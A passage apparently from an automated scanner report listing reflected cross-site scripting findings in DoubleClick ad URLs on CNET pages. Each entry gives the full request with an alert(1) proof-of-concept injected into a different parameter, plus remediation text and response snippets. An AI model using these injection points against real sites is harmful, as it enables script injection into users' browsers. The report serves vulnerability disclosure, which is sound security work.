Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae93"-alert(1)-"c1a656bef97 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa53'-alert(1)-'20a1eda3f6c was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41489"-alert(1)-"2cc112ad18b was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59eb9'-alert(1)-'a7fc128b15f was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56db1"-alert(1)-"f50fc3f5031 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5af5b"-alert(1)-"d6186458506 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3311b'-alert(1)-'99299d172eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49200"-alert(1)-"2b903183c61 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2600b'-alert(1)-'a9e12c1e8f3 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 176ca"-alert(1)-"53528f4652 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOY ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a176b"-alert(1)-"36a5848f12d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd5b"-alert(1)-"1ee697af197 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN048"); var fscUrl = url; var fs ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1593"-alert(1)-"9914ac032e4 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074"); var fscUrl = url; ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddae"-alert(1)-"32d4a8875d7 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
